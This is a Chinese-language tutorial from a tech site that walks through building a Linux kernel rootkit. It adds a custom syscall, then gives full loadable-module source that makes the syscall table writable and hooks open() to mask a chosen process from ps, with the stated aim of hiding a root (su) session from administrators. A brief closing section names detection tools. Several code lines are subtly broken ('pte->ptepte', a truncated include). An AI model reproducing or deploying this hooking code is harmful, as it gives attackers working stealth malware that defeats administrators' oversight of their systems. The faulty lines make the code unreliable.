51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术25年5月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

Rootkit技术入门:从syscall到hook!

作者:shan66
安全
本教程将重点介绍如何通过hooking系统调用来进行这些活动。在本教程的第一部分,我们将打造自己的系统调用,然后打造一个hook到我们创建的系统调用上面的rootkit。在最后一部分,我们将创建一个rootkit来隐藏我们选择的进程。

一、什么是rootkit

简单地说,rootkit是一种能够隐身的恶意程序,也就是说,当它进行恶意活动的时候,操作系统根本感觉不到它的存在。想象一下,一个程序能够潜入到当前操作系统中,并且能够主动在进程列表中隐藏病毒,或者替换日志文件输出,或者两者兼而有之——那它就能有效地清除自身存在的证据了。此外,它还可以从受保护的内存区域中操纵系统调用,或将接口上的数据包导出到另一个接口。本教程将重点介绍如何通过hooking系统调用来进行这些活动。在本教程的第一部分,我们将打造自己的系统调用,然后打造一个hook到我们创建的系统调用上面的rootkit。在最后一部分,我们将创建一个rootkit来隐藏我们选择的进程。

rootkit

二、用户空间与内核空间

我们之所以上来就打造一个系统调用,其目的就是为了更好地理解在内核空间与用户空间中到底发生了些什么。在用户空间中运行的进程,对内存的访问将受到一定限制,而在内核空间运行的进程则可以访问所有内存空间。但是,用户空间的代码可以通过内核暴露的接口来访问内核空间,这里的所说的接口就是系统调用。如果你曾经用C语言编程,并且摆弄过Linux的话(是的,我们将用C编程,但不用担心,因为这里介绍的例子会非常简单),那么你很可能已经用过系统调用了,只不过你没有意识到罢了。read()、write()、open()就是几个比较常见的系统调用,只不过我们通常都是通过诸如fopen()或fprintf()之类的库函数来调用它们而已。

当你以root身份运行进程的时候,不见得它们就会运行在内核空间。因为root用户进程仍然是一个用户空间的进程,只不过root用户的进程的UID = 0,内核验证过其身份后会赋予其超级用户权限罢了。但是,即使拥有超级用户权限,仍然需要通过系统调用接口才能请求内核的各种资源。我希望大家能够明确这一点,这对进一步阅读下面的内容非常重要。

好了,闲话少说,下面切入正题。

三、所需软硬件

linux内核(我使用debian的最小化安装,内核版本为3.16.36)

虚拟机软件(VMware、Virtualbox、ESXi等)

我建议给VM配置2个CPU内核,至少4GB内存,但1核和2GB也能对付。

需要强调的是︰

1. 我不会对示例代码进行详尽的介绍,因为代码都自带了注释。这样做好处是,可以督促读者自行深入学习。

2. 我的VM使用的是Debian最小化安装,因为我发现内核的版本越旧,打造自己的系统调用时就越容易,这就是选择3.16.36的原因。

3. 文中的所有命令都是以root帐户在VM中运行的。

四、系统调用:pname

启动VM,让我们先从一个内核源码开始玩起。实际上,介绍如何打造自己的系统调用的教程已经有许多了。如果你想打造一个简单的“hello world”系统调用的话,请参考这篇文章:https://chirath02.wordpress.com/2016/08/24/hello-world-system-call/。

通过下面的命令,获取内核源码的副本,并将其解压缩到/usr/src目录下面:

  1. wget https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.16.36.tar.xz 
  2. tar -xvf linux-3.16.36.tar.xz -C /usr/src/ 
  3. cd /usr/src/linux-3.16.36 

pname (进程名称):

现在,让我们从一个简单的系统调用开始入手:当向它传递一个进程名称时,它会将该进程对应的PID返回到启动该系统调用的终端上面。首先,创建目录pname,然后通过cd命令切换到该目录下面:

  1. mkdir pname 
  2. cd pname 
  3. nano pname.c 
  1. #include <linux/syscalls.h> 
  2. #include <linux/kernel.h> 
  3. #include <linux/sched.> 
  4. #include <linux/init.h> 
  5. #include <linux/tty.h> 
  6. #include <linux/string.h> 
  7. #include "pname.h" 
  8. asmlinkage long sys_process_name(char* process_name){ 
  9.     /*tasklist struct to use*/ 
  10.     struct task_struct *task; 
  11.     /*tty struct*/ 
  12.     struct tty_struct *my_tty; 
  13.     /*get current tty*/ 
  14.     my_tty = get_current_tty(); 
  15.     /*placeholder to print full string to tty*/ 
  16.     char name[32]; 
  17.     /*<sched.h> library method that iterates through list of processes from task_struct defined above*/ 
  18.     for_each_process(task){ 
  19.         /*compares the current process name (defined in task->comm) to the passed in name*/ 
  20.         if(strcmp(task->comm,process_name) == 0){ 
  21.             /*convert to string and put into name[]*/ 
  22.             sprintf(name, "PID = %ld\n", (long)task_pid_nr(task)); 
  23.             /*show result to user that called the syscall*/ 
  24.                         (my_tty->driver->ops->write) (my_tty, name, strlen(name)+1); 
  25.         } 
  26.     } 
  27.     return 0; 

然后,创建头文件:

  1. nano pname.h 
  1. asmlinkage long sys_process_name(char* process_name); 

接下来,创建一个Makefile:

  1. nano Makefile 

在里面,添加如下内容:

  1. obj-y :pname.o 

保存并退出。

将pname目录添加到内核的Makefile中:

回到/usr/src/linux-3.16.36目录,并编辑Makefile

  1. cd .. 
  2. nano Makefile 

您要查找core-y += kernel/mm/fs/ipc/security/crypto/block/所在的行。

  1. cat -n Makefile | grep -i core-y 

然后

  1. nano +(line number from the cat command here) Makefile 

 

将pname目录添加到内核的Makefile中

将pname目录添加到此行的末尾(不要忘记“/”):

  1. core-y += kernel/ mm/ fs/ ipc/ security/ crypto/ block/ pname/ 

当我们编译这个文件的时候,编译器就会知道从哪里寻找创建新的系统调用所需的源文件了。

将pname和sys_process_name添加到系统调用表中:

请确保仍然位于/usr/src/linux-3.16.36目录中。接下来,我们需要将新建的系统调用添加到系统调用表中。如果您使用的是64位系统,那么它将会添加到syscall_64.tbl文件的前#300之后(将64位和32位系统调用隔离开来)。此前,我的64位系统调用最后一个是#319,所以我的新系统调用将是#320。如果它是一个32位系统,那么你可以在syscall_32.tbl文件结尾处进行相应的编辑。

  1. nano arch/x86/syscalls/syscall_64.tbl 

添加新的系统调用:   

  1. 320 common pname sys_process_name 

 

将pname和sys_process_name添加到系统调用表中

将sys_process_name(char * process_name)添加到syscall头文件中:

最后,头文件必须提供我们函数的原型,因为asmlinkage用于定义函数的哪些参数可以放在堆栈上。它必须添加到include / linux / syscalls.h文件的最底部:

  1. asmlinkage long sys_process_name(char* process_name); 

将pname和sys_process_name添加到系统调用表中

编译新内核(这个过程需要一段时间,请稍安勿躁):

这将需要很长时间,大概需要1-2小时或更多,具体取决于这个VM所拥有的资源的多寡。然后,从源代码文件夹/usr/src/linux-3.16.36中输入下列命令:

  1.      
  2. make menuconfig 

通过方向键选中保存选项,按回车键,然后退出。

如果您正在运行的虚拟机具有2个内核,则可以使用下列命令:

  1. make -j 2 

否则的话,只需输入下列命令即可:

  1. make 

现在,耐心等待它运行结束。

安装新编译的内核:

完成上述操作后(希望没有任何错误),还必须进行安装操作,然后重新启动。

  1. make install -j 2 # or without -j option if not enough cores 
  2. make modules_install install 
  3. reboot 

测试新的pname系统调用:

还记得使用哪个数字把我们的系统调用中添加到系统调用表中的吗?我使用的数字为320,这意味着系统调用号为320,同时,我们必须以字符串的形式来传递进程名称。下面,让我们测试一下这个新的系统调用。

  1. nano testPname.c 
  1. #include <stdio.h> 
  2. #include <linux/kernel.h> 
  3. #include <sys/syscall.h> 
  4. #include <unistd.h> 
  5. #include <string.h> 
  6. int main(){ 
  7.     char name[32]; 
  8.     puts("Enter process to find"); 
  9.     scanf("%s",name); 
  10.     strtok(name, "\n"); 
  11.     long int status = syscall(320, name); //syscall number 320 and passing in the string.  
  12.     printf("System call returned %ld\n", status); 
  13.     return 0; 
  1. gcc testPname.c -o testPname 
  2. ./testPname 

由于我使用ssh配置我的VM,我将进入进程sshd。我打开了另一个终端来查看所有通过sshd运行的进程,然后运行该可执行文件:

测试新的pname系统调用

该系统调用通过遍历进程列表发现了3个sshd进程(grep sshd不是正在运行的sshd进程),并通过TTY将其输出到调用它的终端上,最后成功退出(状态值为0)。

现在,您已经有权在内核(受保护的内存区)空间中查找进程了。这个进程列表中,你不会发现这个系统调用——尽管它正在运行,但你会发现testPname可执行文件正在运行:

测试新的pname系统调用

如何才能找到我们的新系统调用呢? 很简单:使用strace工具。

  1. sudo apt-get install strace 

针对可执行文件运行strace时,它将暂停以读取用户输入(可以通过系统调用read()来读入,但是需要注意的是,在我们的测试程序中使用的是来自stdio.h库的scanf()函数)。这时,输入你喜欢的任何进程即可。

在下面,从read()系统调用到程序退出的代码都进行了突出显示:

  1. strace ./testPname 

 

strace ./testPname

只要把bash的进程名称传递给strace,它就会立刻找出该进程所使用的系统调用——我们的syscall_320。你也可以使用该工具来检查我们运行的程序用到的所有其他系统调用,例如mmap(内存映射)和mprotect(内存保护)等。我建议大家逐一研究这些系统调用,以充分了解它们都可以做哪些事情,并仔细考虑攻击者能够用它们来干什么。

此后,我们将hooking系统调用open(),但是就目前来说,不妨先用我们的第一个rootkit来“钩取”系统调用syscall_320

五、利用Rootkit“钩取”Pname

首先要弄清楚的一件事情是,现在我们要以hook的形式来打造一个内核模块,而不是借助系统调用。这些模块可以随时通过insmod和rmmod命令(前提是您已经获得了相应的权限)加载到内存和从内核中删除。为了查看当前正在运行的所有模块,您可以使用lsmod命令。就像我们的新程序将成为一个模块一样,从技术上讲,它可以被定义为一个hook,因为我们将“hooking”到之前创建的pname系统调用上。

在研究过程中,我在https://www.quora.com/How-can-I-hook-system-calls-in-Linux发现了一篇非常棒的文章,它深入浅出地介绍了打造hook的方法。请选择一个存储hook的目录并利用cd命令切换到这个目录下面,这里我选择的是root目录。

查找sys_call_table地址:

我们首先要做的事情就是找到系统调用表地址,因为一旦找到了这个地址,我们就能够对其进行相应的处理,进而hook系统调用了。为了找到这个地址,我们只需在终端中键入:

  1. cat /boot/System.map-3.16.36 | grep sys_call_table 

 

查找sys_call_table地址

将这个地址复制到我们的代码中。

注意:有许多方法可以用来动态搜索sys_call_table,我强烈建议您使用这些方法而不是硬编码。然而,为了便于学习,这里就不那么讲究了。我打算将来编写一个更高级的rootkit,让它也支持动态搜索能力。如果你想提前了解这方面的知识并亲自尝试一下的话,我建议阅读下面的文章: https://memset.wordpress.com/2011/01/20/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x/

Hook! Hook! Hook!

以下是我的captainhook.c代码:

  1. #include <asm/unistd.h> 
  2. #include <asm/cacheflush.h> 
  3. #include <linux/init.h> 
  4. #include <linux/module.h> 
  5. #include <linux/kernel.h> 
  6. #include <linux/syscalls.h> 
  7. #include <asm/pgtable_types.h> 
  8. #include <linux/highmem.h> 
  9. #include <linux/fs.h> 
  10. #include <linux/sched.h> 
  11. #include <linux/moduleparam.h> 
  12. #include <linux/unistd.h> 
  13. #include <asm/cacheflush.h> 
  14. MODULE_LICENSE("GPL"); 
  15. MODULE_AUTHOR("D0hnuts"); 
  16. /*MY sys_call_table address*/ 
  17. //ffffffff81601680 
  18. void **system_call_table_addr; 
  19. /*my custom syscall that takes process name*/ 
  20. asmlinkage int (*custom_syscall) (char* name); 
  21. /*hook*/ 
  22. asmlinkage int captain_hook(char* play_here) { 
  23.     /*do whatever here (print "HAHAHA", reverse their string, etc) 
  24.         But for now we will just print to the dmesg log*/ 
  25.     printk(KERN_INFO "Pname Syscall:HOOK! HOOK! HOOK! HOOK!...ROOOFFIIOO!"); 
  26.     return custom_syscall(play_here); 
  28. /*Make page writeable*/ 
  29. int make_rw(unsigned long address){ 
  30.     unsigned int level; 
  31.     pte_t *pte = lookup_address(address, &level); 
  32.     if(pte->pte &~_PAGE_RW){ 
  33.         pte->pte |=_PAGE_RW; 
  34.     } 
  35.     return 0; 
  37. /* Make the page write protected */ 
  38. int make_ro(unsigned long address){ 
  39.     unsigned int level; 
  40.     pte_t *pte = lookup_address(address, &level); 
  41.     pte->ptepte = pte->pte &~_PAGE_RW; 
  42.     return 0; 
  44. static int __init entry_point(void){ 
  45.     printk(KERN_INFO "Captain Hook loaded successfully..\n"); 
  46.     /*MY sys_call_table address*/ 
  47.     system_call_table_addr = (void*)0xffffffff81601680; 
  48.     /* Replace custom syscall with the correct system call name (write,open,etc) to hook*/ 
  49.     custom_syscall = system_call_table_addr[__NR_pname]; 
  50.     /*Disable page protection*/ 
  51.     make_rw((unsigned long)system_call_table_addr); 
  52.     /*Change syscall to our syscall function*/ 
  53.     system_call_table_addr[__NR_pname] = captain_hook; 
  54.     return 0; 
  56. static int __exit exit_point(void){ 
  57.         printk(KERN_INFO "Unloaded Captain Hook successfully\n"); 
  58.     /*Restore original system call */ 
  59.     system_call_table_addr[__NR_pname] = custom_syscall; 
  60.     /*Renable page protection*/ 
  61.     make_ro((unsigned long)system_call_table_addr); 
  62.     return 0; 
  64. module_init(entry_point); 
  65. module_exit(exit_point); 

你可能已经注意到__NR_pname,它代表数字,即pname的系统调用的编码。别忘了我们已经将该系统调用添加到syscall_64.tbl(tbl = table duhh)中。 我们赋予它一个数字、一个名称和函数名。在这里,我们使用的是其名称(pname)。它将拦截pname系统调用,并且每成功一次就打印一次dmesg。

创建Makefile:

我们必须创建另一个Makefile,具体方法就像我们在创建系统调用时所做的一样,但由于这里是一个模块,所以会有一点不同:

  1. nano Makefile 
  1. obj-m += captainHook.o 
  2. all: 
  3.         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 
  4. clean: 
  5.         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 

创建Makefile

在加载到运行中的内核后测试该hook:

现在万事俱备,只剩下编译了。对其进行编译的时候,绝对不会像编译内核那样费时,因为它只是一个模块而已。为此,只需键入下列命令:

  1. make 

很好,你现在应该多了一些其他文件,而我们想要的是.ko文件:

在加载到运行中的内核后测试该hook

现在打开另一个终端,键入以下命令以清除dmesg,然后插入该模块并运行testPname,并跟踪其输出:

第一个终端:

  1. dmesg -c 
  2. dmesg -wH 

第二个终端:

  1. insmod captainHook.ko 
  2. cd .. 
  3. ./testPname 
  4. rmmod captainHook 
  5. captainhookworks 

经过一番努力,终于成功地创建了一个可以抓取系统调用(也就是rootkit)的钩子!想象一下,如果你的__NR_ pname是__NR_open或__NR_read会怎样? 您可以自己尝试一下,或继续阅读下一部分。不过,就这一点来说,有很多其他教程可资利用,例如:https://ruinedsec.wordpress.com/2013/04/04/modifying-system-calls-dispatching-linux/

六、对系统管理命令“ps”隐身

现在,让我们通过编程技术来实现对ps命令隐藏进程。首先,找到你想要隐藏的进程的PID,并想清楚你想让它伪装成哪个进程。就本例而言,我将用一个bash进程给su(sudo)进程打掩护,以便系统管理员看不到有人正在使用超级用户权限运行。

注意:Linux中的一切皆文件。例如“/proc/cpuinfo”文件存放的是CPU信息,内核版本位于“/proc/version”文件中。而“/proc/uptime”和“/proc/stat”文件则分别用来存放系统正常运行时间和空闲时间。当运行ps命令时,它实际上是打开进程的文件,以使用open()系统调用查看相关信息。当进程首次启动时,会使用系统调用write()将其写入具有相应PID#的文件中。针对ps命令运行strace就能查找它们,或者查看它使用了哪些系统调用。

这里,我们将使用captainHook.c作为样板:

  1. nano phide.c 
  1. #include <asm/unistd.h> 
  2. #include <asm/cacheflush.h> 
  3. #include <linux/init.h> 
  4. #include <linux/module.h> 
  5. #include <linux/kernel.h> 
  6. #include <linux/syscalls.h> 
  7. #include <asm/pgtable_types.h> 
  8. #include <linux/highmem.h> 
  9. #include <linux/fs.h> 
  10. #include <linux/sched.h> 
  11. #include <linux/moduleparam.h> 
  12. #include <linux/unistd.h> 
  13. #include <asm/cacheflush.h> 
  14. MODULE_LICENSE("GPL"); 
  15. MODULE_LICENSE("D0hnuts"); 
  16. /*MY sys_call_table address*/ 
  17. //ffffffff81601680 
  18. void **system_call_table_addr; 
  19. asmlinkage int (*original_open)(const char *pathname, int flags); 
  20. asmlinkage int open_hijack(const char *pathname, int flags) { 
  21.     /*This hooks all  OPEN sys calls and check to see what the path of the file being opened is 
  22.     currently, the paths must be hard coded for the process you wish to hide, and the process you would like it to impersonate*/ 
  23.     if(strstr(pathname, "/proc/2793/status") != NULL) { 
  24.         printk(KERN_ALERT "PS PROCESS HIJACKED %s\n", pathname); 
  25.     //The new process location will be written into the syscall table for the open command, causing it to open a different file than the one originaly requested 
  26.         memcpy(pathname, "/proc/2794/status", strlen(pathname)+1); 
  27.     } 
  28.     return (*original_open)(pathname, flags); 
  30. //Make syscall table  writeable 
  31. int make_rw(unsigned long address){ 
  32.         unsigned int level; 
  33.         pte_t *pte = lookup_address(address, &level); 
  34.         if(pte->pte &~_PAGE_RW){ 
  35.                 pte->pte |=_PAGE_RW; 
  36.         } 
  37.         return 0; 
  39. // Make the syscall table  write protected 
  40. int make_ro(unsigned long address){ 
  41.         unsigned int level; 
  42.         pte_t *pte = lookup_address(address, &level); 
  43.         pte->ptepte = pte->pte &~_PAGE_RW; 
  44.         return 0; 
  46. static int __init start(void){ 
  47.         system_call_table_addr = (void*)0xffffffff81601680; 
  48.     //return the system call to its original state 
  49.         original_open = system_call_table_addr[__NR_open]; 
  50.         //Disable page protection 
  51.         make_rw((unsigned long)system_call_table_addr); 
  52.         system_call_table_addr[__NR_open] = open_hijack; 
  53.         printk(KERN_INFO "Open psHook loaded successfully..\n"); 
  54.     return 0; 
  56. static int __exit end(void){ 
  57.         //restore original system call 
  58.         system_call_table_addr[__NR_open] = original_open; 
  59.         //Enable syscall table  protection 
  60.         make_ro((unsigned long)system_call_table_addr); 
  61.     printk(KERN_INFO "Unloaded Open psHook successfully\n"); 
  62.         return 0; 
  64. module_init(start); 
  65. module_exit(end); 

复制前面使用的Makefile,同时将顶部的"captainHook.o"替换为“phide.o”。

然后,输入下列命令

  1. make 

以及

  1. insmod phide.ko (一定别忘了使用dmesg命令) : 

 

对系统管理命令“ps”隐身

如您所见,这里成功实现了隐身!除此之外,还可以使用这里介绍的方法来隐藏多个进程。

七、如何防御?

你可能注意到了,我这里只是使用另一个正在运行的进程来隐藏我们的进程。所以在PS表中会有重复的PID。这很容易被发现,但有一些方法可以完全隐藏它,我计划在未来的rootkit文章中加以介绍。

记得早些时候我提到的lsmod命令吗? 它就可以列出在内核上运行的模块,效果具体如下图所示。

lsmod命令以列出在内核上运行的模块

要想查看所有模块,可以使用:

  1. cat/proc/modules 

因为rootkits通常在内存中待命,所以最好使用一个可以主动寻找rootkit的程序,例如:

  1. kbeast – https://volatility-labs.blogspot.ca/2012/09/movp-15-kbeast-rootkit-detecting-hidden.html 
  2. chkroot – http://www.chkrootkit.org/ 
  3. kernel check – http://la-samhna.de/library/kern_check.c 

 

[[180595]]

 

八、结束语

我们希望本文能够帮您了解系统调用、内核空间和用户空间方面的相关知识。最重要的是,通过阅读本文,可以让您意识到钩住系统调用其实非常简单的事情,同时,也让您意识到只需少的可怜的编程技巧就足以让你为所欲为。当然,还有一些非常先进的rootkits类型,我们将后续的文章中陆续加以介绍。在下一篇文章中,我们介绍如何在无需查找PID的情况下隐藏进程。

责任编辑:赵宁宁 来源: 安全客
rootkitsyscallhook恶意程序
相关推荐
前端 | React深入:MixinHOC再到Hook
本文介绍了React采用的三种实现状态逻辑复用的技术,并分析了他们的实现原理、使用方法、实际应用以及如何选择使用他们。

2019-04-11 15:45:08

ReactMixin前端
SQL,入门熟练
在《写给新人的数据库指南》,我们已经成功的安装数据库,并且导入数据,今天进入SQL实战练习。SQL是数据库的查询语言,语法结构简单,相信本文会让你从入门到熟练。

2017-06-26 09:15:39

SQL数据库基础
堆栈溢出技术入门高深:如何书写shell code
虽然溢出在程序开发过程中不可完全避免,但溢出对系统的威胁是巨大的,由于系统的特殊性,溢出发生时攻击者可以利用其漏洞来获取系统的高级权限root,因此本文将详细介绍堆栈溢出技术。

2012-11-27 15:41:41

入门放弃:深度学习中的模型蒸馏技术
模型蒸馏在自然语言处理、计算机视觉和语音识别等领域均有广泛研究,这篇阅读笔记只包括与计算机视觉相关的部分论文。

2020-04-10 15:05:09

深度学习人工智能蒸馏
Linux入门之《Linux入门精通》
《Linux从入门到精通》适合广大Linux初中级用户、开源软件爱好者和大专院校学生阅读,同时也非常适合准备从事Linux下开发的各类人员。

2012-02-29 00:49:06

Linux学习
图解OSPF入门配置验证
在1个大型网络中,如果不是所有的设备都是Cisco的,具有私有性质的EIGRP就不能用,这时候就要用到OSPF协议。下面是Cisco特意推出的图解OSPF从入门到配置,大家赶紧收藏吧。

2013-06-06 13:42:48

OSPF入门配置
Android 开发入门精通
Android是一种基于Linux&reg;V2.6内核的综合操作环境。最初,Android的部署目标是移动电话领域,包括智能电话和更廉价的翻盖手机。但是,Android全面的计算服务和丰富的功能支持完全有能力扩展到移动电话市场以外。

2010-02-06 15:31:18

ibmdwAndroid
Android 开发入门精通
Android是一种基于Linux&reg;V2.6内核的综合操作环境。最初,Android的部署目标是移动电话领域,包括智能电话和更廉价的翻盖手机。但是,Android全面的计算服务和丰富的功能支持完全有能力扩展到移动电话市场以外。Android也可以用于其他的平台和应用程序。本专题提供的教程、技术文章首先带大家了解Android开发,进而深入到Android开发的各个方面。

2009-07-22 14:55:16

ibmdwAndroid
API网关入门放弃
假设你正在开发一个电商网站,那么这里会涉及到很多后端的微服务,比如会员、商品、推荐服务等等。那么这里就会遇到一个问题,APPBrowser怎么去访问这些后端的服务

2019-07-02 14:17:18

API网关网关流量
Canvas入门小猪头
Canvas(画布)是在HTML5中新增的标签用于在网页实时生成图像,可以操作图像内容,是一个可以用JavaScript操作的位图(bitmap)。

2021-02-21 22:53:01

CanvasHTML5JavaScript
Android混淆入门精通
作为Android开发者,如果你不想开源你的应用,那么在应用发布前,就需要对代码进行混淆处理,从而让我们代码即使被反编译,也难以阅读。本篇文章的目的就是让一个初学者在看完后,能在不进行任何帮助的情况下,独立写出适合自己代码的混淆规则。

2016-12-08 22:39:40

Android
聊聊Canvas入门猪头
Canvas(画布)是在HTML5中新增的标签用于在网页实时生成图像,可以操作图像内容,是一个可以用JavaScript操作的位图(bitmap)。

2021-09-01 22:58:22

Canvas标签
机器学习入门精通
本部门主要对机器学习的基本概念以及相关的方法分类进行一个概要的介绍。进行的拓展主要在于总结和科普,没有进行详细详细的展开,后续会进一步进行展开或总结。

2017-05-09 08:48:44

机器学习
HashSet 集合,入门精通
在JDK1.8中,HashMap是由数组+链表+红黑树构成,相对于早期版本的JDKHashMap实现,新增了红黑树作为底层数据结构,在数据量较大且哈希碰撞较多时,能够极大的增加检索的效率。

2022-06-10 08:17:52

HashMap链表红黑树
搞懂 ELF - 入门遗忘
ELF的全称是ExecutableandLinkingFormat,即“可执行可连接格式”,通俗来说,就是二进制程序。ELF规定了这二进制程序的组织规范,所有以这规范组织的文件都叫ELF文件。

2022-10-20 08:02:29

ELFRTOSSymbol
入门掉坑:Go 内存池/对象池技术介绍
Go中怎么实现内存池,直接用map可以吗常用库里GroupCache、BigCache的内存池又是怎么实现的有没有坑对象池又是什么想看重点的同学,可以直接看第2节GroupCache总结。

2020-06-04 12:15:37

Go内存池对象池
堆栈溢出技术入门高深:利用堆栈溢出获得shell
在《堆栈溢出技术从入门到高深(一)》中,笔者为大家介绍了一下堆栈的基础知识以及shellcode基本算法等知识,本文我们将继续为读者介绍如何利用堆栈溢出来获得shell。

2012-11-27 15:46:51

堆栈溢出
堆栈溢出技术入门高深:windows系统下堆栈溢出
本文我们来看看windows系统下的程序。我们的目的是研究如何利用windows程序的堆栈溢出漏洞。

2012-11-27 16:03:00

堆栈溢出
后门技术和Linux LKM Rootkit详解
在这篇文章里,我们将看到各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。我们将会发现LKM后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们自己的基于LKM的Rootkit程序,主要体现在TCPIP层,因为我们相信这是在系统管理员面前最好的隐藏后门的地方。

2010-01-15 10:32:40

后门技术和Linux LKM Rootkit详解
本文探讨了各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。并讲解了如何制造基于LKM的Rootkit程序(主要体现在TCPIP层)。

2010-01-14 20:57:59

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服